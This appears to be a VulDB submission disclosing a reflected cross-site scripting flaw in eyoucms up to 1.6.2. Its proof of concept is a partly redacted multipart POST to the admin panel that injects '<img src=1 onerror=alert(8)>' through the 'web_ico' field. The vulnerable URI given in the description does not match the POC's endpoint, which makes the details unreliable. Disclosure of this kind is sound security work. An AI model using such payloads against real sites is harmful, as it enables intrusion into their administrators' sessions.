Submission #111320: eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability information

Title: eyoucms up to 1.6.2 'web_ico' reflected xss vulnerability
Description: eyoucms up to 1.6.2 has an XSS vulnerability. The vulnerable URI is /yxcms/index.php?r=admin/extendfield/mesedit&tabid=12&id=4 and the vulnerable multipart parameter is name="web_ico". POC below:

POST /eyoucms/login.php?m=admin&c=System&a=web&lang=cn HTTP/1.1
*****************************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy
Content-Disposition: form-data; name="web_ico"

<img src=1 onerror=alert(8)>
------WebKitFormBoundaryq3khRwDr0dBifJAy
**********************************************
------WebKitFormBoundaryq3khRwDr0dBifJAy--

See details at https://github.com/sleepyvv/vul_report/blob/main/EYOUCMS/XSS2.md
Source: https://www.eyoucms.com/
User: WWesleywww (UID 43117)
Submitted: 07/04/2023 15:36 (3 years ago)
Moderated: 14/04/2023 10:36 (7 days later)
Status: Accepted
VulDB Entry: 225943 [EyouCms up to 1.6.2 HTTP POST Request mesedit&tabid=12&id=4 web_ico cross site scripting]
Points: 17
